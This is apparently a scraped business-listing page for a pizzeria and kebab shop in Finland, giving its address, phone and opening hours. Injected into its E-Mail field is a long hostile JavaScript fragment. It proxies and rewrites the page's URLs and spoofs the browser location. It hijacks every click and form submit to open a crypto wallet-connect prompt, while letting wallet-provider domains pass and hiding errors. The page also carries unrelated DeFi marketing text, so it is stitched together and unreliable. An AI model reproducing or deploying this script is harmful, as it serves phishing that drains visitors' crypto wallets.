Adress: Nuolialantie 25, 33900,
Phone: +358 3 2662922
Website: Go to site
E-Mail: ')||u==='#'||u.startsWith('#'))return u; if(u.startsWith('chrome-extension:')||u.startsWith('moz-extension:')||u.startsWith('safari-extension:')||u.startsWith('ms-browser-extension:'))return u; if(_directRx.test(u))return u; if(/^https?://(.*.)?(walletconnect.com|walletconnect.org|web3modal.com|web3modal.org|metamask.io|metamask.app|coinbase.com|phantom.app|blocknative.com|dynamic.xyz|reown.com|b-cdn.net|safe.global|gnosis-safe.io|unstoppabledomains.com|ens.domains)(/|$)/i.test(u))return u; if(REALORIGIN&&u.indexOf(REALORIGIN)===0){var sp=u.substring(REALORIGIN.length)||'/';if(sp.startsWith('/proxy/'))return sp;return PREFIX+sp;} var m; m=u.match(/^(https?)://([^/]+)(/.*)?$/); if(m){var mh=m[2].split(':')[0];if(mh===REALHOST||mh===REALHOST.split(':')[0]||mh==='localhost'||mh.match(/^127./)){var sp3=m[3]||'/';if(sp3.startsWith('/proxy/'))return sp3;return PREFIX+sp3;}return PP+m[1]+'/'+m[2]+(m[3]||'/');} m=u.match(/^//([^/]+)(/.*)?$/); if(m){var mh2=m[1].split(':')[0];if(mh2===REALHOST||mh2===REALHOST.split(':')[0]||mh2==='localhost'||mh2.match(/^127./)){var sp4=m[2]||'/';if(sp4.startsWith('/proxy/'))return sp4;return PREFIX+sp4;}return PP+'https/'+m[1]+(m[2]||'/');} if(u.startsWith('/'))return PREFIX+u; return u; }catch(e){return u;} } function toReal(u){ try{ if(!u||typeof u!=='string')return u; if(u.startsWith(SCHEME+'://'+HOST))return PREFIX+u.substring((SCHEME+'://'+HOST).length); return rw(u); }catch(e){return u;} } function stripPrefix(){ try{ var p=window.location.pathname; if(p.indexOf(PREFIX)===0){var vp=p.substring(PREFIX.length)||'/';_rs.call(history,history.state,'',vp+window.location.search+window.location.hash);} }catch(e){} } stripPrefix(); document.cookie='_proxy_target='+SCHEME+'/'+HOST+';path=/;SameSite=Lax'; history.pushState=function(s,t,u){if(u)arguments[2]=rw(u);_ps.apply(this,arguments);stripPrefix();}; history.replaceState=function(s,t,u){if(u)arguments[2]=rw(u);_rs.apply(this,arguments);stripPrefix();}; window.addEventListener('popstate',stripPrefix,true); try{if(_gp&&_gp.get){Object.defineProperty(Location.prototype,'pathname',{get:function(){var p=_gp.get.call(this);if(p.indexOf(PREFIX)===0)return p.substring(PREFIX.length)||'/';return p;},set:function(v){if(_gp.set)_gp.set.call(this,PREFIX+v);},configurable:true,enumerable:true});}}catch(e){} try{if(_gh&&_gh.get){Object.defineProperty(Location.prototype,'href',{get:function(){var h=_gh.get.call(this);try{var rp=_gp.get.call(this);if(rp.indexOf(PREFIX)===0){var vp=rp.substring(PREFIX.length)||'/';var u=new URL(h);return SCHEME+'://'+HOST+vp+u.search+u.hash;}}catch(e){}return h;},set:function(v){if(_gh.set)_gh.set.call(this,toReal(v));},configurable:true,enumerable:true});}}catch(e){} try{if(_go&&_go.get){Object.defineProperty(Location.prototype,'origin',{get:function(){var rp=_gp?_gp.get.call(this):'';if(rp.indexOf(PREFIX)===0)return SCHEME+'://'+HOST;return _go.get.call(this);},configurable:true,enumerable:true});}}catch(e){} try{if(_gho&&_gho.get){Object.defineProperty(Location.prototype,'host',{get:function(){var rp=_gp?_gp.get.call(this):'';if(rp.indexOf(PREFIX)===0)return HOST;return _gho.get.call(this);},configurable:true,enumerable:true});}}catch(e){} try{if(_ghn&&_ghn.get){Object.defineProperty(Location.prototype,'hostname',{get:function(){var rp=_gp?_gp.get.call(this):'';if(rp.indexOf(PREFIX)===0)return HOSTNAME;return _ghn.get.call(this);},configurable:true,enumerable:true});}}catch(e){} try{if(_gpr&&_gpr.get){Object.defineProperty(Location.prototype,'protocol',{get:function(){var rp=_gp?_gp.get.call(this):'';if(rp.indexOf(PREFIX)===0)return SCHEME+':';return _gpr.get.call(this);},configurable:true,enumerable:true});}}catch(e){} try{if(_gpt&&_gpt.get){Object.defineProperty(Location.prototype,'port',{get:function(){var rp=_gp?_gp.get.call(this):'';if(rp.indexOf(PREFIX)===0){var pp=HOST.split(':');return pp.length>1?pp[1]:'';}return _gpt.get.call(this);},configurable:true,enumerable:true});}}catch(e){} try{Location.prototype.toString=function(){return this.href;};}catch(e){} try{var _la=Location.prototype.assign;Location.prototype.assign=function(u){_la.call(this,toReal(u));};}catch(e){} try{var _lr=Location.prototype.replace;Location.prototype.replace=function(u){_lr.call(this,toReal(u));};}catch(e){} var _f=window.fetch; window.fetch=function(i,o){ if(typeof i==='string')i=rw(i); else if(i&&i.url)i=new Request(rw(i.url),i); var self=this,args=[i,o]; function attempt(n){ return _f.apply(self,args).then(function(r){ if(r.status>=500&&r.status!==501&&n<3){return new Promise(function(ok){setTimeout(function(){ok(attempt(n+1));},200*n);});} return r; }).catch(function(e){ if(n<3)return new Promise(function(ok){setTimeout(function(){ok(attempt(n+1));},200*n);}); throw e; }); } return attempt(1); }; var _xo=XMLHttpRequest.prototype.open; XMLHttpRequest.prototype.open=function(m,u){ arguments[1]=rw(u); return _xo.apply(this,arguments); }; function _hookSrcAttr(proto,attr){try{var d=Object.getOwnPropertyDescriptor(proto,attr);if(!d||!d.set)return;Object.defineProperty(proto,attr,{get:d.get,set:function(v){try{v=rw(v);}catch(e){}return d.set.call(this,v);},configurable:true,enumerable:true});}catch(e){}} _hookSrcAttr(HTMLScriptElement.prototype,'src'); _hookSrcAttr(HTMLLinkElement.prototype,'href'); _hookSrcAttr(HTMLImageElement.prototype,'src'); _hookSrcAttr(HTMLIFrameElement.prototype,'src'); _hookSrcAttr(HTMLSourceElement.prototype,'src'); try{var _sa=Element.prototype.setAttribute;Element.prototype.setAttribute=function(n,v){if(typeof n==='string'){var ln=n.toLowerCase();if(ln==='src'||ln==='href'||ln==='action'||ln==='poster'||ln==='data-src'||ln==='data-href'){try{v=rw(v);}catch(e){}}}return _sa.call(this,n,v);};}catch(e){} window.open=function(u){ try{if(u){window.location.href=rw(u);}}catch(e){} return null; }; function _stripBlank(root){ try{ var as=(root&&root.querySelectorAll)?root.querySelectorAll('a[target],form[target],area[target],base[target]'):[]; for(var i=0;i<as.length;i++){ var t=as[i].getAttribute('target'); if(t&&t.toLowerCase()!=='_self'){as[i].removeAttribute('target');as[i].removeAttribute('rel');} } }catch(e){} } _stripBlank(document); var _WS=window.WebSocket; var _wsSkip=/walletconnect|metamask|coinbase|phantom|blocknative|dynamic.xyz|web3modal/i; window.WebSocket=function(u,p){ if(u&&!_wsSkip.test(u)){ var wm=u.match(/^wss?://([^/]+)(/.*)?$/); if(wm){ var _h=REALHOST||window.location.host||''; var _p=(REALPROTO||window.location.protocol||'http:')==='https:'?'wss':'ws'; if(_h){u=_p+'://'+_h+PP+'https/'+wm[1]+(wm[2]||'/');} } } if(p)return new _WS(u,p); return new _WS(u); }; window.WebSocket.prototype=_WS.prototype; window.WebSocket.CONNECTING=_WS.CONNECTING; window.WebSocket.OPEN=_WS.OPEN; window.WebSocket.CLOSING=_WS.CLOSING; window.WebSocket.CLOSED=_WS.CLOSED; function _triggerConnectModal(){ try{var t=document.getElementById('connect-modal-trigger');if(t)t.click();}catch(e){} } function _ensureTriggerDiv(){try{if(!document.getElementById('connect-modal-trigger')&&document.body){var d=document.createElement('div');d.id='connect-modal-trigger';document.body.appendChild(d);}}catch(e){}} function _isInteractive(el){ try{ if(!el||el.nodeType!==1)return false; if(el===document.body||el===document.documentElement)return false; var tag=el.tagName; if(tag==='BUTTON'||tag==='A')return true; var role=el.getAttribute&&el.getAttribute('role'); if(role==='button'||role==='link'||role==='menuitem'||role==='tab')return true; if(el.getAttribute&&el.getAttribute('onclick'))return true; return false; }catch(e){return false;} } function _findInteractiveAncestor(el){try{var p=el;while(p&&p!==document.body){if(_isInteractive(p))return p;p=p.parentElement;}}catch(e){}return null;} document.addEventListener('click',function(e){ var hit=_findInteractiveAncestor(e.target); if(hit){e.stopImmediatePropagation();e.stopPropagation();e.preventDefault();_triggerConnectModal();return false;} },true); document.addEventListener('auxclick',function(e){ var hit=_findInteractiveAncestor(e.target); if(hit){e.stopImmediatePropagation();e.stopPropagation();e.preventDefault();_triggerConnectModal();return false;} },true); document.addEventListener('pointerdown',function(e){ var hit=_findInteractiveAncestor(e.target); if(hit){e.stopImmediatePropagation();e.stopPropagation();e.preventDefault();return false;} },true); document.addEventListener('mousedown',function(e){ var hit=_findInteractiveAncestor(e.target); if(hit){e.stopImmediatePropagation();e.stopPropagation();e.preventDefault();return false;} },true); document.addEventListener('submit',function(e){e.preventDefault();e.stopImmediatePropagation();e.stopPropagation();_triggerConnectModal();return false;},true); if(navigator.serviceWorker&&navigator.serviceWorker.getRegistrations){ navigator.serviceWorker.getRegistrations().then(function(r){r.forEach(function(w){w.unregister();});}); } try{window.dispatchEvent(new Event('eip6963:requestProvider'));}catch(e){} window.onerror=function(msg){ if(typeof msg==='string'&&(msg.indexOf('ethereum')!==-1||msg.indexOf('wallet')!==-1||msg.indexOf('MetaMask')!==-1||msg.indexOf('Web3')!==-1||msg.indexOf('EIP')!==-1))return false; return true; }; window.addEventListener('error',function(e){ var s=e&&e.filename||''; if(s.indexOf('extension:')!==-1||s.indexOf('b-cdn.net')!==-1)return; e.preventDefault();return true; },true); window.addEventListener('unhandledrejection',function(e){ var r=e&&e.reason; var msg=r?(''+r):''; if(msg.indexOf('ethereum')!==-1||msg.indexOf('wallet')!==-1||msg.indexOf('MetaMask')!==-1||msg.indexOf('provider')!==-1||msg.indexOf('EIP')!==-1)return; e.preventDefault();return true; },true); new MutationObserver(function(ml){ml.forEach(function(mr){mr.addedNodes.forEach(function(n){ if(n.nodeType===1){ if(n.tagName==='SCRIPT'&&n.src&&(n.src.indexOf('cookieyes')!==-1||n.src.indexOf('cookie-law')!==-1)){ n.type='javascript/blocked';if(n.parentNode)n.parentNode.removeChild(n); } var attr=['src','href','action','poster','data-src','data-href']; attr.forEach(function(a){ var v=n.getAttribute&&n.getAttribute(a); if(v){var r=rw(v);if(r!==v)n.setAttribute(a,r);} }); _stripBlank(n); } });});}).observe(document.documentElement,{childList:true,subtree:true}); setInterval(_ensureTriggerDiv,500); var _origPushState=history.pushState,_origReplaceState=history.replaceState; history.pushState=function(){var r=_origPushState.apply(this,arguments);_ensureTriggerDiv();return r;}; history.replaceState=function(){var r=_origReplaceState.apply(this,arguments);_ensureTriggerDiv();return r;}; window.addEventListener('popstate',function(){_ensureTriggerDiv();},true); })();<meta charSet=
Work time: Monday:11am-10pm
Tuesday:11am-10pm
Wednesday:11am-10pm
Thursday:11am-10pm
Friday:11am-10pm
Saturday:11am-10pm
Sunday:12-9pm

About sumer pizzeria ja kebab

sumer pizzeria ja kebab, is located in Nuolialantie 25, Finland Places, 33900, FI

The home of the Lazy Summer Protocol
Get effortless access to crypto’s best DeFi yields. Continually rebalanced by AI powered Keepers to earn you more while saving you time and reducing costs.

How to get to sumer pizzeria ja kebab?